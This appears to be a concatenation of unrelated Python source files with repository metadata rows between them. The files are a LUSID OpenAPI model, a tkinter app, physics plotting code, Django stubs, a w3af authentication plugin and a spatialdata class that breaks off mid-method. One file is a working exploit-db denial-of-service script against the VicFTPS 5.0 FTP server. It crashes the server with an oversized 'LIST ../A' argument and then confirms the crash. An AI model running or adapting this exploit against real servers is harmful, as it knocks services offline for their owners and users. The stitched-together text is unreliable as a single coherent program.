def __init__(self, start_date=None, maturity_date=None, contract_size=None, flow_convention=None, rate=None, dom_ccy=None, instrument_type=None, local_vars_configuration=None): # noqa: E501
"""TermDepositAllOf - a model defined in OpenAPI"
:param start_date: The start date of the instrument. For term deposits this is the start date of the interest calculation period. (required)
:type start_date: datetime
:param maturity_date: The maturity date of the instrument. For term deposits this is the last date of the interest calculation period. (required)
:type maturity_date: datetime
:param contract_size: The principal amount of the term deposit. (required)
:type contract_size: float
:param flow_convention: (required)
:type flow_convention: lusid.FlowConventions
:param rate: The fixed rate for the term deposit. Specified as a decimal, e.g 0.03 is meant to be 3% interest (required)
:type rate: float
:param dom_ccy: The domestic currency of the instrument. This should be the same as the Currency set on the FlowConventions.
:type dom_ccy: str
:param instrument_type: The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan (required)
:type instrument_type: str
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._start_date = None
self._maturity_date = None
self._contract_size = None
self._flow_convention = None
self._rate = None
self._dom_ccy = None
self._instrument_type = None
self.discriminator = None
self.start_date = start_date
self.maturity_date = maturity_date
self.contract_size = contract_size
self.flow_convention = flow_convention
self.rate = rate
self.dom_ccy = dom_ccy
self.instrument_type = instrument_type
@property
def start_date(self):
"""Gets the start_date of this TermDepositAllOf. # noqa: E501
The start date of the instrument. For term deposits this is the start date of the interest calculation period. # noqa: E501
:return: The start_date of this TermDepositAllOf. # noqa: E501
:rtype: datetime
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""Sets the start_date of this TermDepositAllOf.
The start date of the instrument. For term deposits this is the start date of the interest calculation period. # noqa: E501
:param start_date: The start_date of this TermDepositAllOf. # noqa: E501
:type start_date: datetime
"""
if self.local_vars_configuration.client_side_validation and start_date is None: # noqa: E501
raise ValueError("Invalid value for `start_date`, must not be `None`") # noqa: E501
self._start_date = start_date
@property
def maturity_date(self):
"""Gets the maturity_date of this TermDepositAllOf. # noqa: E501
The maturity date of the instrument. For term deposits this is the last date of the interest calculation period. # noqa: E501
:return: The maturity_date of this TermDepositAllOf. # noqa: E501
:rtype: datetime
"""
return self._maturity_date
@maturity_date.setter
def maturity_date(self, maturity_date):
"""Sets the maturity_date of this TermDepositAllOf.
The maturity date of the instrument. For term deposits this is the last date of the interest calculation period. # noqa: E501
:param maturity_date: The maturity_date of this TermDepositAllOf. # noqa: E501
:type maturity_date: datetime
"""
if self.local_vars_configuration.client_side_validation and maturity_date is None: # noqa: E501
raise ValueError("Invalid value for `maturity_date`, must not be `None`") # noqa: E501
self._maturity_date = maturity_date
@property
def contract_size(self):
"""Gets the contract_size of this TermDepositAllOf. # noqa: E501
The principal amount of the term deposit. # noqa: E501
:return: The contract_size of this TermDepositAllOf. # noqa: E501
:rtype: float
"""
return self._contract_size
@contract_size.setter
def contract_size(self, contract_size):
"""Sets the contract_size of this TermDepositAllOf.
The principal amount of the term deposit. # noqa: E501
:param contract_size: The contract_size of this TermDepositAllOf. # noqa: E501
:type contract_size: float
"""
if self.local_vars_configuration.client_side_validation and contract_size is None: # noqa: E501
raise ValueError("Invalid value for `contract_size`, must not be `None`") # noqa: E501
self._contract_size = contract_size
@property
def flow_convention(self):
"""Gets the flow_convention of this TermDepositAllOf. # noqa: E501
:return: The flow_convention of this TermDepositAllOf. # noqa: E501
:rtype: lusid.FlowConventions
"""
return self._flow_convention
@flow_convention.setter
def flow_convention(self, flow_convention):
"""Sets the flow_convention of this TermDepositAllOf.
:param flow_convention: The flow_convention of this TermDepositAllOf. # noqa: E501
:type flow_convention: lusid.FlowConventions
"""
if self.local_vars_configuration.client_side_validation and flow_convention is None: # noqa: E501
raise ValueError("Invalid value for `flow_convention`, must not be `None`") # noqa: E501
self._flow_convention = flow_convention
@property
def rate(self):
"""Gets the rate of this TermDepositAllOf. # noqa: E501
The fixed rate for the term deposit. Specified as a decimal, e.g 0.03 is meant to be 3% interest # noqa: E501
:return: The rate of this TermDepositAllOf. # noqa: E501
:rtype: float
"""
return self._rate
@rate.setter
def rate(self, rate):
"""Sets the rate of this TermDepositAllOf.
The fixed rate for the term deposit. Specified as a decimal, e.g 0.03 is meant to be 3% interest # noqa: E501
:param rate: The rate of this TermDepositAllOf. # noqa: E501
:type rate: float
"""
if self.local_vars_configuration.client_side_validation and rate is None: # noqa: E501
raise ValueError("Invalid value for `rate`, must not be `None`") # noqa: E501
self._rate = rate
@property
def dom_ccy(self):
"""Gets the dom_ccy of this TermDepositAllOf. # noqa: E501
The domestic currency of the instrument. This should be the same as the Currency set on the FlowConventions. # noqa: E501
:return: The dom_ccy of this TermDepositAllOf. # noqa: E501
:rtype: str
"""
return self._dom_ccy
@dom_ccy.setter
def dom_ccy(self, dom_ccy):
"""Sets the dom_ccy of this TermDepositAllOf.
The domestic currency of the instrument. This should be the same as the Currency set on the FlowConventions. # noqa: E501
:param dom_ccy: The dom_ccy of this TermDepositAllOf. # noqa: E501
:type dom_ccy: str
"""
self._dom_ccy = dom_ccy
@property
def instrument_type(self):
"""Gets the instrument_type of this TermDepositAllOf. # noqa: E501
The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan # noqa: E501
:return: The instrument_type of this TermDepositAllOf. # noqa: E501
:rtype: str
"""
return self._instrument_type
@instrument_type.setter
def instrument_type(self, instrument_type):
"""Sets the instrument_type of this TermDepositAllOf.
The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan # noqa: E501
:param instrument_type: The instrument_type of this TermDepositAllOf. # noqa: E501
:type instrument_type: str
"""
if self.local_vars_configuration.client_side_validation and instrument_type is None: # noqa: E501
raise ValueError("Invalid value for `instrument_type`, must not be `None`") # noqa: E501
allowed_values = ["QuotedSecurity", "InterestRateSwap", "FxForward", "Future", "ExoticInstrument", "FxOption", "CreditDefaultSwap", "InterestRateSwaption", "Bond", "EquityOption", "FixedLeg", "FloatingLeg", "BespokeCashFlowsLeg", "Unknown", "TermDeposit", "ContractForDifference", "EquitySwap", "CashPerpetual", "CapFloor", "CashSettled", "CdsIndex", "Basket", "FundingLeg", "FxSwap", "ForwardRateAgreement", "SimpleInstrument", "Repo", "Equity", "ExchangeTradedOption", "ReferenceInstrument", "ComplexBond", "InflationLinkedBond", "InflationSwap", "SimpleCashFlowLoan"] # noqa: E501
if self.local_vars_configuration.client_side_validation and instrument_type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `instrument_type` ({0}), must be one of {1}" # noqa: E501
.format(instrument_type, allowed_values)
)
self._instrument_type = instrument_type
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TermDepositAllOf):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, TermDepositAllOf):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
] | |
dc20d47c77e072ae91e749eeca8edf20f26f99a1 | 4f7aa44d21ae38093869e79e10f5cdc8842d48b7 | /05-mylibrary-lab-next/presentation/app_main_window.py | 8979bca4b7ccccd07d557f3862a560c0266e63e2 | [
"Apache-2.0"
] | permissive | iproduct/intro-python | 31e802c2c21a4df3361656f12d267ec52c2d6564 | 7e08e144da2907fcf45dc734ab4e896631625d75 | refs/heads/master | 2023-02-19T11:42:37.522624 | 2023-02-13T15:54:03 | 2023-02-13T15:54:03 | 128,980,155 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,198 | py | from tkinter import *
from tkinter import ttk, messagebox
from dao.book_repository_json import BookRepositoryJson
from presentation.add_edit_book_dialog import AddEditBookDialog
from utils.tkinter_utils import print_hierarchy, get_ceter_window_left_top
MAIN_WIDTH = 800
MAIN_HEIGHT = 600
class AppMainWindow(ttk.Frame):
def __init__(self, root, application):
super().__init__(root, padding="3 3 12 12")
self.application = application
root.title("My Library")
print(f"Windowing system: {root.tk.call('tk', 'windowingsystem')}") # return x11, win32, aqua
root.option_add('*tearOff', FALSE) # remove menu tear off ability
left, top = get_ceter_window_left_top(root, MAIN_WIDTH, MAIN_HEIGHT)
root.geometry(f"{MAIN_WIDTH}x{MAIN_HEIGHT}+{left}+{top}")
self.grid(column=0, row=0, sticky=(N, W, E, S) )
self.menubar = Menu(root)
root['menu'] = self.menubar
# File menu
menu_file = Menu(self.menubar)
self.menubar.add_cascade(menu=menu_file, label="File", underline=0)
menu_file.add_command(label='New', command = self.newFile, underline=0, accelerator="Control+Shift+N")
self.bind_all("<Control-Shift-KeyPress-N>", self.newFile)
print("!!!", menu_file.entryconfigure(0))
menu_file.add_command(label="Open ...", command = self.openFile)
menu_file.add_command(label='Close', command = self.closeFile)
menu_file.entryconfigure('Close', state=DISABLED)
# Books menu
menu_books = Menu(self.menubar)
self.menubar.add_cascade(menu=menu_books, label="Books", underline=0)
menu_books.add_command(label='Add New Book', command=self.application.show_add_book, underline=2)
menu_books.add_command(label='Browse Books', command=self.application.browseBooks())
def newFile(self, event = None):
messagebox.showinfo(title="New File Dialog", message="Creating DB file ...")
def openFile(self):
messagebox.showinfo(title="File Open Dialog", message="Opening DB file ...")
def closeFile(self):
messagebox.showinfo(title="File Close Dialog", message="Closing DB file ...")
| [
"[email protected]"
] | |
0c33ff75f22af311c81bd6cebc6adb11379e4481 | 7124a12aee78af2cf3cdd5adbe38debd07fda07b | /Simulaciones/Proyecto_4_2/Scripts/Potencial_Graphics.py | 3da508c74cc29aebc52f670a7ed4bf17cbdb5dd2 | [] | no_license | giovannilopez9808/Notas_Agosto_2020 | e52ac9dd150037d0a8981fb765bcf0a7e73ed04b | 5fc8d5baabbe9ed5f3ee1b33c59e7ae4e5aff526 | refs/heads/master | 2023-02-01T07:50:38.559046 | 2020-12-14T05:18:34 | 2020-12-14T05:18:34 | 293,427,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,990 | py | import numpy as np
import matplotlib.pyplot as plt
#<-----------------------------Potencial--------------------->
def potential_lj(r,e,sigma):
v=4*e*((sigma/r)**12-(sigma/r)**6)
return v
#<----------------------------Fuerza--------------------->
def force_lj(r,e,sigma):
f=4*e*(12*sigma**12/r**13-6*sigma**6/r**7)
return f
#
def potencial_fene(r,e,ra):
k=10*e
v=-k*ra**2*np.log(1-(r/ra)**2)/2
return v
#
def force_fene(r,e,ra):
k=10*e
f=k*r/((1-(r/ra)**2))
return f
#
def graphic(r,sum,lj,fene,ylim,label,name):
#<----------------------------Direcciones de los archivos-------------------->
dir_graphics="../Graphics/"
plt.xlim(r[0],1.3);plt.ylim(-5,ylim)
plt.plot(r,sum,lw=3,color="#7400b8",label=label+"$(r)$")
plt.plot(r,lj,lw=3,color="#5390d9",label=label+"$_{LJ}$",ls="--")
plt.plot(r,fene,lw=3,color="#64dfdf",label=label+"$_{FENE}$",ls="--")
plt.ylabel(label+"(r)");plt.xlabel("Distancia radial (r)")
plt.legend(frameon=False,ncol=1,loc="upper center",fontsize=12)
plt.subplots_adjust(left=0.121,bottom=0.11,right=0.924,top=0.943)
plt.savefig(dir_graphics+name+".png")
plt.clf()
#<------------------------Parametros-------------------->
sigma=1;e=1;ra=1.3
#<------------------------------Valores para el radio---------------------->
r=np.arange(0.8,1.29+0.01,0.01);n=np.size(r)
v=np.zeros(np.size(r));v_lj=np.zeros(np.size(r));v_fene=np.zeros(np.size(r))
f=np.zeros(np.size(r));f_lj=np.zeros(np.size(r));f_fene=np.zeros(np.size(r))
#<----------------------------Potencial-------------------->
for i in range(n):
r_i=r[i]
if r_i<2.5:
v_lj[i]+=potential_lj(r_i,e,sigma)
f_lj[i]+=force_lj(r_i,e,sigma)
if r_i<ra:
v_fene[i]+=potencial_fene(r_i,e,ra)
f_fene[i]+=force_fene(r_i,e,ra)
v=v_lj+v_fene
f=f_lj+f_fene
graphic(r,v,v_lj,v_fene,30,"V","potential")
graphic(r,f,f_lj,f_fene,150,"F","force") | [
"[email protected]"
] | |
54282bbde50ae71e65e4fb61139e2c5fb38a6790 | b953909018be86cf8cdf328e2b13395c1dbe28c0 | /apps/yt_barcode/urls.py | 63a531af7e694e0637fd5fcc51edabbfa4bd2f2f | [] | no_license | wangyong240/mes | 06ce26d146aebe0b0103dda4fdd198c3cefc6014 | 12d7321c1b96ae0fdd8f26029462e1943a500c01 | refs/heads/master | 2023-01-01T13:29:29.853063 | 2020-09-19T01:19:22 | 2020-09-19T01:19:22 | 296,762,233 | 1 | 0 | null | 2020-09-19T01:20:05 | 2020-09-19T01:20:04 | null | UTF-8 | Python | false | false | 95 | py | from django.conf.urls.defaults import *
urlpatterns = patterns('yt_barcode.views',
)
| [
"[email protected]"
] | |
edcd5818de24ad48b4dd91248306c61d7ac34f7b | 44b6bc41fe8e424196f98dbc5b2f050c1f9645f8 | /platforms/windows/dos/16230.py | e8600ad68d652ef330e3daac086438f90ca632dd | [] | no_license | angeloobeta/exploit-database | 21283dd8549f47836a35af6f3ea7b63b8dba11ea | 43f3d9e94c01a7f51e30561a96214af231dd9d36 | refs/heads/master | 2021-08-08T21:07:38.794539 | 2017-11-11T05:01:28 | 2017-11-11T05:01:28 | 110,380,452 | 0 | 1 | null | 2017-11-11T21:09:05 | 2017-11-11T21:09:04 | null | UTF-8 | Python | false | false | 3,696 | py | #!/usr/bin/python
#
#
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxxxx xxx xxx xxx xxx xxx xxx xxxxxx
# xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx
# xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx
# xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx
#
#
#[+]Exploit Title: Exploit Denial of Service VicFTPS
#[+]Date: 02\24\11
#[+]Author C4SS!0 G0M3S
#[+]Software Link: http://vicftps.50webs.com/VicFTPS-5.0-bin.zip
#[+]Version: 5.0
#[+]Tested On: WIN-XP SP3
#[+]CVE: N/A
#[+]Language: Portuguese
#
#
#Author C4SS!0 G0M3S || Cassio Gomes
#E-mail [email protected]
#Site www.x000.org/
#
#
import socket
import time
import os
import sys
if os.name == 'nt':
os.system("cls")#SE FOR WINDOWS
os.system("color 4f")
else:
os.system("clear")#SE FOR LINUX
def usage():
print """
============================================================
============================================================
===============Exploit Denial of Service Vicftps 5.0========
===============Autor C4SS!0 G0M3S || C\xe1ssio Gomes==========
===============E-mail [email protected]==================
===============Site www.x000.org/===========================
============================================================
============================================================
"""
if len(sys.argv)!=3:
usage()
print "\t\t[-]Modo de Uso: python %s <Host> <Porta>" % sys.argv[0]
print "\t\t[-]Exemplo: python %s 192.168.1.2 21" % sys.argv[0]
sys.exit(0)
buf = "../A" * (330/4)
usage()
print "\t\t[+]Conectando-se Ao Servidor %s\n" % sys.argv[1]
time.sleep(1)
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
print "\t\t[+]Checando se o Servidor e Vulneravel\n"
time.sleep(1)
banner = s.recv(2000)
if((banner.find("VicFTPS"))!=-1):
print "\t\t[+]Servidor e Vulneravel:)\n"
time.sleep(1)
else:
print "\t\t[+]Sinto Muito, Servidor Nao e Vulneravel:(\n"
time.sleep(1)
print "\t\t[+]Enviando Exploit Denial of Service\n"
time.sleep(1)
s.send("USER anonymous\r\n")
s.recv(2000)
s.send("PASS\r\n")
s.recv(2000)
s.send("LIST "+buf+"\r\n")
print "\t\t[+]Exploit Enviado Com Sucesso ao Servidor "+sys.argv[1]+"\n"
time.sleep(1)
print "\t\t[+]Checando Se o Exploit Funcionou\n"
time.sleep(1)
try:
sock = socket.socket(socket.AF_INET,sock.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
print "\t\t[+]Sinto Muito o Exploit Nao Funcionou:(\n"
time.sleep(1)
sys.exit(0)
except:
print "\t\t[+]Exploit Funcionou, Servidor Derrubado:)\n"
time.sleep(1)
except:
print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n"
| [
"[email protected]"
] | |
e8cc7618e6732e6c875b28838d8f4542ddb359da | addfc0757e0b620fd27858853aab3996fe37b7fe | /backend/talkback_21080/wsgi.py | e2190e49df445abc47705e96b12874299248f2b7 | [] | no_license | crowdbotics-apps/talkback-21080 | c8692837edef8591f29b1d72706b732fb72a7aba | e34baaaf37582c5ace5bb79c7091139c1ca0ebde | refs/heads/master | 2022-12-27T08:45:51.269041 | 2020-10-05T00:06:09 | 2020-10-05T00:06:09 | 301,252,632 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | """
WSGI config for talkback_21080 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'talkback_21080.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
ed1e78002b6d5631a704ce698be181c232c0acf8 | a475b8dfdbc90a57470b5be8dfd6fa2367de73f3 | /testproj/testapp/models.py | f7132e89fc9556e3630c00942b04b806b562cece | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | Moliholy/django-tastypie-crust | 9080be75726385716d75280f68cef7ad25b90761 | 520154aa36aa4ba9e132c4ea1d042ea8bcb235b2 | refs/heads/master | 2020-03-18T19:26:20.528764 | 2018-05-28T12:10:52 | 2018-06-12T14:53:26 | 135,154,352 | 0 | 0 | null | 2018-05-28T11:53:52 | 2018-05-28T11:53:51 | null | UTF-8 | Python | false | false | 508 | py | #!/usr/bin/env python
# -*- coding: utf-8
from django.db import models
from django.utils.translation import ugettext, ugettext_lazy as _
class Homepage(models.Model):
user = models.ForeignKey('auth.User')
url = models.URLField()
class Meta:
verbose_name = _('Homepage')
verbose_name_plural = _('Homepages')
def __unicode__(self):
format = ugettext('Homepage %(url)s of user %(username)s')
return format % {'url': self.url, 'username': self.user.username}
| [
"[email protected]"
] | |
a31dfce1ad8bf27319d90f5801053f00d781a11e | 2ffd40f761b266a5f033fefb9faff4ab9bfa8c89 | /bin/chardetect | 9a8a190a8f753c149aa7f8a02563c8d8ecf4d214 | [] | no_license | Sasikumar-P/facebook-api | 6850df1a9bf7dc9837853f74e28a11b4a15c585b | bc1ae820597916cb3e534e772b4c9e366b4091cf | refs/heads/master | 2021-09-01T22:57:39.298239 | 2017-12-29T02:36:13 | 2017-12-29T02:36:13 | 115,678,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | #!/home/sasi/Desktop/graphapi/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
88d961648002f0954e825a25e4a6df90ad2cc19a | 84c9a6fb5e18741f14a55d0d737e2a556383770d | /venv/Lib/site-packages/w3af/plugins/auth/detailed.py | e59db0c2a76390e6865939efe4857822f81e8d51 | [] | no_license | AravindChan96/Vulcan | 638a1db2f84df08bc50dd76c7f142014d529fbec | 5548a6f36f04108ac1a6ed8e707930f9821f0bd9 | refs/heads/master | 2022-11-05T15:05:54.224578 | 2020-06-19T20:44:14 | 2020-06-19T20:44:14 | 273,396,348 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,305 | py | """
detailed.py
Copyright 2011 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
from urllib import quote_plus
import w3af.core.controllers.output_manager as om
from w3af.core.controllers.plugins.auth_plugin import AuthPlugin
from w3af.core.controllers.exceptions import BaseFrameworkException
from w3af.core.data.options.opt_factory import opt_factory
from w3af.core.data.options.option_list import OptionList
from w3af.core.data.url.handlers.redirect import GET_HEAD_CODES
class detailed(AuthPlugin):
"""
Detailed authentication plugin.
"""
MAX_REDIRECTS = 10
def __init__(self):
AuthPlugin.__init__(self)
# User configuration
self.username = ''
self.password = ''
self.username_field = ''
self.password_field = ''
self.method = 'POST'
self.data_format = '%u=%U&%p=%P'
self.auth_url = 'http://host.tld/'
self.check_url = 'http://host.tld/'
self.check_string = ''
self.follow_redirects = False
self.url_encode_params = True
# Internal attributes
self._show_login_error = True
self._attempt_login = True
def login(self):
"""
Login to the application
"""
#
# In some cases the authentication plugin is incorrectly configured and
# we don't want to keep trying over and over to login when we know it
# will fail
#
if not self._attempt_login:
return False
#
# Create a new debugging ID for each login() run
#
self._new_debugging_id()
self._clear_log()
msg = 'Logging into the application with user: %s' % self.username
self._log_debug(msg)
#
# Send the auth HTTP request
#
data = self._get_data_from_format()
functor = getattr(self._uri_opener, self.method)
try:
http_response = functor(self.auth_url,
data,
grep=False,
cache=False,
follow_redirects=self.follow_redirects,
debugging_id=self._debugging_id)
except Exception, e:
msg = 'Failed to login to the application because of exception: %s'
self._log_debug(msg % e)
return False
self._log_http_response(http_response)
#
# Check if we're logged in
#
if not self.has_active_session():
self._log_info_to_kb()
return False
om.out.debug('Login success for %s' % self.username)
return True
def logout(self):
"""
User logout
"""
return None
def has_active_session(self):
"""
Check user session
"""
# Create a new debugging ID for each has_active_session() run
self._new_debugging_id()
msg = 'Checking if session for user %s is active'
self._log_debug(msg % self.username)
try:
http_response = self._uri_opener.GET(self.check_url,
grep=False,
cache=False,
follow_redirects=True,
debugging_id=self._debugging_id)
except Exception, e:
msg = 'Failed to check if session is active because of exception: %s'
self._log_debug(msg % e)
return False
self._log_http_response(http_response)
body = http_response.get_body()
logged_in = self.check_string in body
msg_yes = 'User "%s" is currently logged into the application'
msg_yes %= (self.username,)
msg_no = ('User "%s" is NOT logged into the application, the'
' `check_string` was not found in the HTTP response'
' with ID %s.')
msg_no %= (self.username, http_response.id)
msg = msg_yes if logged_in else msg_no
self._log_debug(msg)
return logged_in
def _get_data_from_format(self):
"""
:return: A string with all the information to send to the login URL.
This string contains the username, password, and all the other
information that was provided by the user and needs to be transmitted to
the remote web application.
"""
trans = quote_plus if self.url_encode_params else lambda x: x
result = self.data_format
result = result.replace('%u', trans(self.username_field))
result = result.replace('%U', trans(self.username))
result = result.replace('%p', trans(self.password_field))
result = result.replace('%P', trans(self.password))
return result
def _get_main_authentication_url(self):
return self.auth_url
def get_options(self):
"""
:return: A list of option objects for this plugin.
"""
options = [
('username',
self.username,
'string',
'Username for using in the authentication process'),
('password',
self.password,
'string',
'Password for using in the authentication process'),
('username_field',
self.username_field,
'string', 'Username parameter name (ie. "uname" if the HTML looks'
' like <input type="text" name="uname">...)'),
('password_field',
self.password_field,
'string', 'Password parameter name (ie. "pwd" if the HTML looks'
' like <input type="password" name="pwd">...)'),
('auth_url',
self.auth_url,
'url',
'URL where the username and password will be sent using the'
' configured request method'),
('check_url',
self.check_url,
'url',
'URL used to verify if the session is still active by looking for'
' the check_string.'),
('check_string',
self.check_string,
'string',
'String for searching on check_url page to determine if the'
'current session is active.'),
('data_format',
self.data_format,
'string',
'The format for the POST-data or query string. The following are'
' valid formatting values:\n'
' - %u for the username parameter name value\n'
' - %U for the username value\n'
' - %p for the password parameter name value\n'
' - %P for the password value\n'),
('follow_redirects',
self.follow_redirects,
'boolean',
'Follow HTTP redirects in multi-stage authentication flows'),
('method',
self.method,
'string',
'The HTTP method to use'),
('url_encode_params',
self.url_encode_params,
'boolean',
'URL-encode configured parameters before applying them to the'
'"data_format".'),
]
ol = OptionList()
for o in options:
ol.add(opt_factory(o[0], o[1], o[3], o[2], help=o[3]))
return ol
def set_options(self, options_list):
"""
This method sets all the options that are configured using
the user interface generated by the framework using
the result of get_options().
:param options_list: A dict with the options for the plugin.
:return: No value is returned.
"""
self.username = options_list['username'].get_value()
self.password = options_list['password'].get_value()
self.username_field = options_list['username_field'].get_value()
self.password_field = options_list['password_field'].get_value()
self.data_format = options_list['data_format'].get_value()
self.check_string = options_list['check_string'].get_value()
self.method = options_list['method'].get_value()
self.auth_url = options_list['auth_url'].get_value()
self.check_url = options_list['check_url'].get_value()
self.follow_redirects = options_list['follow_redirects'].get_value()
self.url_encode_params = options_list['url_encode_params'].get_value()
missing_options = []
for o in options_list:
if o.get_value() == '':
missing_options.append(o.get_name())
if missing_options:
msg = ("All parameters are required and can't be empty. The"
" missing parameters are %s")
raise BaseFrameworkException(msg % ', '.join(missing_options))
def get_long_desc(self):
"""
:return: A DETAILED description of the plugin functions and features.
"""
return """
This authentication plugin can login to web applications with more
complex authentication schemas where the auth.generic plugin falls
short.
These configurable parameters exist:
- username
- password
- username_field
- password_field
- data_format
- auth_url
- method
- check_url
- check_string
- follow_redirects
Detailed descriptions for each configurable parameter are available in
the plugin configuration menu.
""" | [
"[email protected]"
] | |
b2a5716e29cbd359293a072d81733438f86495a2 | 52e45c26c110c42de79383e8034fd280fd82a02f | /spatialdata/spatialdb/GravityField.py | 13f3d151d4951e63b963de4d5d79d09bf78493dc | [
"MIT"
] | permissive | geodynamics/spatialdata | 1ae1d2583aae356e9e68cd434c1f17820b49d127 | 2da6aad61c136f0e15f066aaea5fd31851de112f | refs/heads/main | 2023-08-15T07:22:17.676228 | 2023-07-28T03:32:07 | 2023-07-28T03:32:07 | 12,651,854 | 6 | 20 | MIT | 2023-07-28T03:32:09 | 2013-09-06T18:52:14 | C++ | UTF-8 | Python | false | false | 2,821 | py | # ----------------------------------------------------------------------
#
# Brad T. Aagaard, U.S. Geological Survey
#
# This code was developed as part of the Computational Infrastructure
# for Geodynamics (http://geodynamics.org).
#
# Copyright (c) 2010-2023 University of California, Davis
#
# See LICENSE.md for license information.
#
# ----------------------------------------------------------------------
from .SpatialDBObj import SpatialDBObj
from .spatialdb import GravityField as ModuleGravityField
class GravityField(SpatialDBObj, ModuleGravityField):
"""
Spatial database with gravity field information.
Implements `SpatialDB`.
"""
DOC_CONFIG = {
"cfg": """
# Specify a gravity field in 2D with gravity in the -y direction.
[gravity_field]
gravity_dir = [0, -1]
acceleration = 9.80665*meter/second**2
""",
}
import pythia.pyre.inventory
gravityDir = pythia.pyre.inventory.list("gravity_dir", default=[0.0, 0.0, -1.0])
gravityDir.meta['tip'] = "Direction of gravitational body force. " \
"(used only with a Cartesian coordinate system."
from pythia.pyre.units.length import meter
from pythia.pyre.units.time import second
acceleration = pythia.pyre.inventory.dimensional("acceleration",
default=9.80665 * meter / second**2)
acceleration.meta['tip'] = "Gravitational acceleration."
def __init__(self, name="gravityfield"):
"""
Constructor.
"""
SpatialDBObj.__init__(self, name)
return
def _defaults(self):
self.description = "Gravity field"
def _configure(self):
"""
Set members based on inventory.
"""
SpatialDBObj._configure(self)
self._validateParameters(self.inventory)
dir = list(map(float, self.gravityDir))
ModuleGravityField.setGravityDir(self, dir[0], dir[1], dir[2])
ModuleGravityField.setGravityAcc(self, self.acceleration.value)
def _createModuleObj(self):
"""
